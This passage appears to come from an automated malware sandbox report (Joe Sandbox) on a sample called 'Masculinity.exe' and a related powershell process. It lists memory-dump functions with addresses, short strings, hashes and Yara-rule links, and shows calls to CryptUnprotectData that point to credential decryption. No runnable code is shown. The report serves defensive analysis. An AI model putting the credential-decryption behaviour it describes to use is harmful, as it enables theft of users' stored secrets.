(ocq, xrefs: 071CD67E
(ocq, xrefs: 071CD66E
(ocq, xrefs: 071CD9C1

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$(ocq$(ocq
API String ID: 0-2003149739
Opcode ID: a6dd6b9620e82cec13a6af0f600fcfa3fdba17315496abea19bfc0d7d116676f
Instruction ID: 7fdf18dbf0ce596d91d323f4ed5feafd2b32ecb844f8f366ec548b4f033e7bfe
Opcode Fuzzy Hash: a6dd6b9620e82cec13a6af0f600fcfa3fdba17315496abea19bfc0d7d116676f
Instruction Fuzzy Hash: 8CF157B1704306DFDB16DFA8E8417AA7BA2EF96310F15807EE4858B2D1CB31D851CB61

Function 071C2A68 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

84pl, xrefs: 071C2B43
tPcq, xrefs: 071C2BA6
84pl, xrefs: 071C2B4D
tPcq, xrefs: 071C2B9A

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 84pl$84pl$tPcq$tPcq
API String ID: 0-1443535603
Opcode ID: 0cff186428be373dc98a05eb7860912aa7236cc0300e513d20cc5be713c94287
Instruction ID: 00c79292e96257b6c6a0fd5515370995f850fe38c7803affe96cd45d3434817c
Opcode Fuzzy Hash: 0cff186428be373dc98a05eb7860912aa7236cc0300e513d20cc5be713c94287
Instruction Fuzzy Hash: D19138B17102069FCB25DEA9C850B7BBBA6BFE5310F28846ED8059B2D1CF31D941C7A1

Function 071C57C8 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(frl, xrefs: 071C593D
(frl, xrefs: 071C58C9
(frl, xrefs: 071C5947
(frl, xrefs: 071C58BF

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (frl$(frl$(frl$(frl
API String ID: 0-3675676250
Opcode ID: a043e011ed6f587f756d3e6365679ee48ded7cc26c3a2f1cf026a5683cd3f72f
Instruction ID: 8b29a179a1a5bcfd4e877f10181c0fd1a966cc50f23d918fff8bac69867f465a
Opcode Fuzzy Hash: a043e011ed6f587f756d3e6365679ee48ded7cc26c3a2f1cf026a5683cd3f72f
Instruction Fuzzy Hash: F3718EB0A10205DBCB14CF98C542A6EBBB3EF99320F2580ADD805AB394DB31ED51CB91

Function 071CA800 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$cq, xrefs: 071CA85C
$cq, xrefs: 071CA868
$cq, xrefs: 071CA812
$cq, xrefs: 071CA82E

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: $cq$$cq$$cq$$cq
API String ID: 0-2876200767
Opcode ID: 98d4ff26999d5c355d845966ae26260bf52977d13f68e7e02722628e3f36b4e1
Instruction ID: f20ab36fdb2be7088f6950caa6d6998bd5543910209702aad01641534762e135
Opcode Fuzzy Hash: 98d4ff26999d5c355d845966ae26260bf52977d13f68e7e02722628e3f36b4e1
Instruction Fuzzy Hash: DA2129B171031E9BDB2AD9BA9942727769A9FE5712F24C02EA546CB3C1CF35C842C361

Function 071C771C Relevance: 5.1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

Strings

$cq, xrefs: 071C77AB
$cq, xrefs: 071C77EF
$cq, xrefs: 071C77D3
$cq, xrefs: 071C778F

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: $cq$$cq$$cq$$cq
API String ID: 0-2876200767
Opcode ID: 7ea432092ff122bc4634e9d9b94155b0a91d5960ed55139e440606061fa94943
Instruction ID: 90ed622c1765cfaf2f97f288e5947c07a1cb0d5efe49e244fd3f9e7e329f7b69
Opcode Fuzzy Hash: 7ea432092ff122bc4634e9d9b94155b0a91d5960ed55139e440606061fa94943
Instruction Fuzzy Hash: 7A21F1B5A0530ADFCF26CFA4C6066B6BBB1BFA1200F55406ED805876C2D775C544CFA2

Function 071C0308 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

$cq, xrefs: 071C0352
4'cq, xrefs: 071C0373
$cq, xrefs: 071C035E
4'cq, xrefs: 071C037F

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$$cq$$cq
API String ID: 0-1126079151
Opcode ID: f25846f5346f49c28d999a1a96a70b4deeaddc75d2ec0f8b7004e4cf5ad17f00
Instruction ID: d4e5738271010231b939c43e1349924bd0f0c7103edd1b79be0fa8db288f519d
Opcode Fuzzy Hash: f25846f5346f49c28d999a1a96a70b4deeaddc75d2ec0f8b7004e4cf5ad17f00
Instruction Fuzzy Hash: 2201D82031A7868FC73797A81C211666FB26FD7250B5A509FC041CB2C7CB194C4583A2

Analysis Process: Masculinity.exePID: 528, Parent PID: 3372COMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	74.7%
Signature Coverage:	22.3%
Total number of Nodes:	229
Total number of Limit Nodes:	18

Executed Functions

Function 001529E0 Relevance: 8.2, Strings: 6, Instructions: 685
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xgq, xrefs: 00153CF6
Xgq, xrefs: 00153CCD
Xgq, xrefs: 00152B57
Xgq, xrefs: 00152A9E
Xgq, xrefs: 00152AD8
Xgq, xrefs: 00152BA4

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: Xgq$Xgq$Xgq$Xgq$Xgq$Xgq
API String ID: 0-3143122102
Opcode ID: 168d2c7382a800d40e973decd957286b975ccb2bf88ea8420d259a60d714d0bd
Instruction ID: b361447c4737af9e849e287c3987433f7a292a8209f276f70b8ce66c772b34de
Opcode Fuzzy Hash: 168d2c7382a800d40e973decd957286b975ccb2bf88ea8420d259a60d714d0bd
Instruction Fuzzy Hash: 11324D6690D7D48FCB638B744CE815B7FB16B92205B8945DFC4C78B687EB288609C362

Function 04E841BC Relevance: 7.6, Strings: 5, Instructions: 1367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

& , xrefs: 04E85890
Tecq, xrefs: 04E84D45
,! L! p! , xrefs: 04E85118
h , xrefs: 04E84526, 04E84D8E, 04E84E03, 04E8548D, 04E8570E
Tecq, xrefs: 04E84D1E

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID: & $,! L! p! $Tecq$Tecq$h
API String ID: 0-4194517112
Opcode ID: 5eaf47ca411d1d3c436e70ccccf79b12f487c6e6009d6490381fa054c77cb0e3
Instruction ID: 8dd82ac5426f98290a743d1735b60d5c4a1106238fab1eb7a67038f199d0157c
Opcode Fuzzy Hash: 5eaf47ca411d1d3c436e70ccccf79b12f487c6e6009d6490381fa054c77cb0e3
Instruction Fuzzy Hash: 61C2B174A41229CFDB65DF24C994BAEB7B2FB89300F5081E9D809A7365DB359E81CF40

Function 00155362 Relevance: 6.4, Strings: 5, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 001555C8
Lj@p, xrefs: 00155566
Lj@p, xrefs: 00155550
0o@p, xrefs: 001553E2
PHcq, xrefs: 001555D9

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
API String ID: 0-4041061496
Opcode ID: 14d0a9aaa58f2aace06eb118d662e6899547c7fbe8e7e7208131afea01a0df12
Instruction ID: 1bb36ab6ea873bc38d736d844a5cf4d1bb557e932d59fdbaf2eae1175e7aed3d
Opcode Fuzzy Hash: 14d0a9aaa58f2aace06eb118d662e6899547c7fbe8e7e7208131afea01a0df12
Instruction Fuzzy Hash: 5491E874E00618CFDB14DFA9C894A9DBBF2BF89301F15C069E819AB365EB349985CF50

Function 0015C468 Relevance: 6.4, Strings: 5, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 0015C6D0
0o@p, xrefs: 0015C4DA
PHcq, xrefs: 0015C6BF
Lj@p, xrefs: 0015C647
Lj@p, xrefs: 0015C65D

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
API String ID: 0-4041061496
Opcode ID: 2e38166b5157e8eac8d2fa9e18825d5f4bb5f28fa0bb91dc6fe5d305dd52eb23
Instruction ID: eaad1db2c776765c4394dad769510c3ad2b5aa48dbff4425e124b8235a92cdfa
Opcode Fuzzy Hash: 2e38166b5157e8eac8d2fa9e18825d5f4bb5f28fa0bb91dc6fe5d305dd52eb23
Instruction Fuzzy Hash: 7F81C674E00218DFDB14DFAAC884A9EBBF2BF89301F14D06AE819AB365DB345945CF51

Function 0015C19B Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 0015C377
PHcq, xrefs: 0015C3EF
0o@p, xrefs: 0015C20A
Lj@p, xrefs: 0015C38D
PHcq, xrefs: 0015C400

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
API String ID: 0-4041061496
Opcode ID: 2b3fb8c1e00cca313d60312b089874abcc70253e647e8150d2780916659fa95e
Instruction ID: fda6b1140082e806f003533d016a49cd69fe7655add374ec007fe8a43348e271
Opcode Fuzzy Hash: 2b3fb8c1e00cca313d60312b089874abcc70253e647e8150d2780916659fa95e
Instruction Fuzzy Hash: 7781C774E00618CFDB54DFAAC884A9DBBF2BF89301F14C06AE819AB365DB349945CF50

Function 0015CA08 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0o@p, xrefs: 0015CA7A
PHcq, xrefs: 0015CC5F
Lj@p, xrefs: 0015CBE7
Lj@p, xrefs: 0015CBFD
PHcq, xrefs: 0015CC70

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
API String ID: 0-4041061496
Opcode ID: 01eb18ff8464e1b84ee146717e896a689ef539bf823715efc0fa2e8d127c3dbd
Instruction ID: ad371f46947c11e72bb0180abd9b03c2d77106324b7463e50a3ec2dac7a63f9f
Opcode Fuzzy Hash: 01eb18ff8464e1b84ee146717e896a689ef539bf823715efc0fa2e8d127c3dbd
Instruction Fuzzy Hash: CE81C574E00618CFDB14DFAAC884A9EBBF2BF89301F14C069E819AB365DB349945CF50

Function 0015D2CD Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 0015D4A7
PHcq, xrefs: 0015D530
0o@p, xrefs: 0015D33A
PHcq, xrefs: 0015D51F
Lj@p, xrefs: 0015D4BD

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
API String ID: 0-4041061496
Opcode ID: 839fe4ebce9779184f651e581ad71a835123c388e80fe0e7ce9b4b210a5ffed5
Instruction ID: bb11d4cf09a8f3da17e672c76f69216b009c15f50882fdc7fa5d4bb7c08a29b8
Opcode Fuzzy Hash: 839fe4ebce9779184f651e581ad71a835123c388e80fe0e7ce9b4b210a5ffed5
Instruction Fuzzy Hash: FE81B574E00218DFDB14DFAAD884A9DBBF2BF89301F14C069E819AB365DB34A945CF51

Function 0015D599 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 0015D7EF
PHcq, xrefs: 0015D800
Lj@p, xrefs: 0015D78D
Lj@p, xrefs: 0015D777
0o@p, xrefs: 0015D60A

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
API String ID: 0-4041061496
Opcode ID: 2df77bce58beacf3505dbc7b235a95216ae7736753516575037b5ad5c5686fdd
Instruction ID: b79d6c72064a32f987fca6f1a64a75de494509f82e045c16f82506e094808ac8
Opcode Fuzzy Hash: 2df77bce58beacf3505dbc7b235a95216ae7736753516575037b5ad5c5686fdd
Instruction Fuzzy Hash: 1081C574E01218CFDB14DFAAD884A9DBBF2BF88305F14C069E819AB365DB349945CF50

Function 0015C738 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 0015C98F
Lj@p, xrefs: 0015C92D
Lj@p, xrefs: 0015C917
0o@p, xrefs: 0015C7AA
PHcq, xrefs: 0015C9A0

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
API String ID: 0-4041061496
Opcode ID: d74f64f97351524cced828797e77b40c15e339ce96a2f542f11ad6de7844c51d
Instruction ID: 0b5a726b5f61d4b6f66f2a04984499a792e125b512b664776420ebbfa743236b
Opcode Fuzzy Hash: d74f64f97351524cced828797e77b40c15e339ce96a2f542f11ad6de7844c51d
Instruction Fuzzy Hash: 5E81D674E00218DFDB14DFAAD984A9DBBF2BF88305F14C06AE819AB365DB349945CF50

Function 0015CFF8 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 0015D260
PHcq, xrefs: 0015D24F
0o@p, xrefs: 0015D06A
Lj@p, xrefs: 0015D1D7
Lj@p, xrefs: 0015D1ED

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PHcq$PHcq
API String ID: 0-4041061496
Opcode ID: 48cc918db7e3af194c9df512058dd3acfbe457e89eb33807ecacf8c2210c822d
Instruction ID: 437fd02379d6ab0b495b1c4670c624e45ad8f12691d53cd39ece5cbeae41a915
Opcode Fuzzy Hash: 48cc918db7e3af194c9df512058dd3acfbe457e89eb33807ecacf8c2210c822d
Instruction Fuzzy Hash: AA81E674E01658CFDB14DFAAD884A9DBBF2BF88301F24C069E819AB365DB349945CF10

Function 00159DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON

Download Yara Rule

Strings

4'cq, xrefs: 00159E04
4'cq, xrefs: 00159F0C
4'cq, xrefs: 0015AB13
(ocq, xrefs: 0015A518

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: (ocq$4'cq$4'cq$4'cq
API String ID: 0-140906574
Opcode ID: 9fa802317b78f482603f2c39b0a8de50e0b6a861d54831a21f404cfa38e1cbd1
Instruction ID: d4bb636a38594dab199c161d72df880ba3c88e0f2e239d9a9687dc6f11ed1929
Opcode Fuzzy Hash: 9fa802317b78f482603f2c39b0a8de50e0b6a861d54831a21f404cfa38e1cbd1
Instruction Fuzzy Hash: 59A28270A40209CFCB15CF68C994AAEBBF2BF88301F558659E815DF261D734ED89CB52

Function 00156FC8 Relevance: 5.5, Strings: 4, Instructions: 451COMMON

Download Yara Rule

Strings

(ocq, xrefs: 00157220
,gq, xrefs: 0015728A
(ocq, xrefs: 00157212
,gq, xrefs: 00157298

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$,gq$,gq
API String ID: 0-2401767512
Opcode ID: 64ea0330e69ebd233be054bf71463dcc04f98bb3eb262dca0210b4b25a567775
Instruction ID: 8d801f8c271a4b9ca97871a32b88b516c7d1de3cd9fdd7b118bc2a9f853d7b14
Opcode Fuzzy Hash: 64ea0330e69ebd233be054bf71463dcc04f98bb3eb262dca0210b4b25a567775
Instruction Fuzzy Hash: E3026130A04219DFCB15CF68E885AADBBF2BF49301F558069EC25AB2A1D730DD49CF51

Function 001569A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

(ocq, xrefs: 00156EDA
Hgq, xrefs: 00156DA6

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: (ocq$Hgq
API String ID: 0-2239030825
Opcode ID: e6e1f426df02ef25a3ba50a513ef69eea25e290720d41a266e532dadf50c8b86
Instruction ID: 48d1bb3abbfa1433cdc382b33ce09640f55e3024391f1eacc32172d7e3c9776f
Opcode Fuzzy Hash: e6e1f426df02ef25a3ba50a513ef69eea25e290720d41a266e532dadf50c8b86
Instruction Fuzzy Hash: 1B127E70A00219CFDB14DF69C854AAEBBF6BF88301F508569E959DB3A1DB309D85CB90

Function 04A69590 Relevance: 2.0, APIs: 1, Instructions: 532COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1957e2649d40e8d379d4c34b9d8517e22f308292be8703a1c1bcb3bca586d5e8
Instruction ID: f0368f6da3eaa7d9a5bcc7a43d511117ec73d699d88844b02121df0c9a18f9f7
Opcode Fuzzy Hash: 1957e2649d40e8d379d4c34b9d8517e22f308292be8703a1c1bcb3bca586d5e8
Instruction Fuzzy Hash: 3B222AB4E00218CFDB14DFA9C884B9EBBB6BF88300F5085A9D419AB355DB34AD85CF51

Function 04A986DC Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 04A98F5D

Memory Dump Source

Source File: 00000007.00000002.3275457914.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a90000_Masculinity.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 81e5b4231f9169d742aba90e0428cfb721545902fe33923dd750a6772560d887
Instruction ID: 73f6cbba464584181ef304cabb9e76f865b895f2fb6e4922bd1272e62ea714b5
Opcode Fuzzy Hash: 81e5b4231f9169d742aba90e0428cfb721545902fe33923dd750a6772560d887
Instruction Fuzzy Hash: 6C1156B2800349AFDB10DF99C904BEEBFF5EF48320F14841AE528A7210C379A954DFA5

Function 04A98EF1 Relevance: 1.6, APIs: 1, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 04A98F5D

Memory Dump Source

Source File: 00000007.00000002.3275457914.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a90000_Masculinity.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: c15a824c257be2979554801b1ee2806874613aee43361684f41448507ec37d78
Instruction ID: 7a96da94420268f285dda7ce6cdeea442c5d9bc86cab17aba64e29ae79ee3ae0
Opcode Fuzzy Hash: c15a824c257be2979554801b1ee2806874613aee43361684f41448507ec37d78
Instruction Fuzzy Hash: 691167B6800249AFDB10DF99C844BDEBFF5EF49320F14845AE528A7210C339A554DFA5

Function 04DFE793 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

Hgq, xrefs: 04DFE799

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID: Hgq
API String ID: 0-2103768809
Opcode ID: febf8671e866e58ccfb730f181922772b8f6fcbe1a098e47f995b9427ea5c8b7
Instruction ID: f122c6adbff85de48ec69f7c7f1f75682417b5e0e41dc06d4e0b447c988e71a4
Opcode Fuzzy Hash: febf8671e866e58ccfb730f181922772b8f6fcbe1a098e47f995b9427ea5c8b7
Instruction Fuzzy Hash: 9881E374E002289FEB65DF69CC54BEDBBB2AF89300F5081A9D51DA72A0DB305E85CF41

Function 04DFD0D0 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ce1fe614ea343876239ed003ba2e5b418edcee0e2f50ffd2cbebe0465784f58
Instruction ID: 975b7a24c27ffddb0f4b4b40290b66477ba85c79fccbd82b471d23001054ef50
Opcode Fuzzy Hash: 4ce1fe614ea343876239ed003ba2e5b418edcee0e2f50ffd2cbebe0465784f58
Instruction Fuzzy Hash: E4825C74E012289FDB64DF69CD94BDEBBB2BB89300F1081EA951DA7265DB305E81CF41

Function 04A60B30 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23f3905c6b449f6e4d961bd576948a0698cdd6c0ff55e160005e6132e2eb96b1
Instruction ID: 6f319a7422f69b255f90aecc964fe577fbf55b88c4f7a0f6fa1f1dc8c8aaa0c6
Opcode Fuzzy Hash: 23f3905c6b449f6e4d961bd576948a0698cdd6c0ff55e160005e6132e2eb96b1
Instruction Fuzzy Hash: A772B074E052298FDB64DF69C984BDDBBB2BB49300F5481E9D44AA7251EB34AEC1CF40

Function 04DFE808 Relevance: .7, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92e0fb847f2cb802d66f8f8fa7cb24aed2fc91966f3c576816e9d17a7435764b
Instruction ID: 839c36a93767a185176795d3081a4e1820e24308aa06e6940a5e4a71106e5d98
Opcode Fuzzy Hash: 92e0fb847f2cb802d66f8f8fa7cb24aed2fc91966f3c576816e9d17a7435764b
Instruction Fuzzy Hash: D0727C74E012289FDB64DF69CD94BDABBB2BF89300F1081E9A50DA7265DB315E81CF41

Function 04AB5B48 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a79f2aa7a078d953646c9cff696136ae87e516d0459ee645be02039ca70bc32c
Instruction ID: 2780da0e1fcea50a098d7f16d296830f1c3726dc837498a7b3605fd31aba6645
Opcode Fuzzy Hash: a79f2aa7a078d953646c9cff696136ae87e516d0459ee645be02039ca70bc32c
Instruction Fuzzy Hash: 14E1C1B4E01218CFEB25DFA9C944B9DBBB2BF88304F1080A9D819A7365DB355E85CF51

Function 04A97B78 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275457914.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a90000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ecffc24330f404ba4f03c6f62011bbb1e4f7b2dee1910e2a14140351c4f4ba
Instruction ID: 3e2435dc01bc4623b9ab7254381edd49d2544ba1991ed9c01d25c4296d4b0d41
Opcode Fuzzy Hash: c6ecffc24330f404ba4f03c6f62011bbb1e4f7b2dee1910e2a14140351c4f4ba
Instruction Fuzzy Hash: A5E1B074E01218CFEB24DFA9C944B9DBBF2BF89304F2081A9D809A7295DB355E85CF54

Function 04E01828 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a09dcc11e60fa7e6e549347f442cbfa6371c69b460ea35562b60d14ddf550516
Instruction ID: 72d1bc8a544b3d61e80143b57c37cda8508ecf0c7be6d7b2022a32d6b032d007
Opcode Fuzzy Hash: a09dcc11e60fa7e6e549347f442cbfa6371c69b460ea35562b60d14ddf550516
Instruction Fuzzy Hash: 77D1C574E01218CFDB64DFA5C994B9EBBB2BF89304F1081A9D819AB364DB356D81CF50

Function 04AB61E8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba077ecb8e2baac74e1c86075cb141eaa73abde6904ae52a8e01e6ffd9f0e209
Instruction ID: 6995cbe249a6b5d7ba74b9b41fb5708446fa273b00d5d01056dfea16bffd03f9
Opcode Fuzzy Hash: ba077ecb8e2baac74e1c86075cb141eaa73abde6904ae52a8e01e6ffd9f0e209
Instruction Fuzzy Hash: 1DD1A374E01218CFDB64DFA5C994B9EBBB2BF89300F1081A9D809AB365DB355E81CF51

Function 04A98FB0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275457914.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a90000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13154b8e5a0d85634aa4433b3f34b9bdfbb73f2cddee8f78740d2b62685ac931
Instruction ID: a635f7702087f814167e15ade54c6666dea15cbaed5b28377271c92b23dabceb
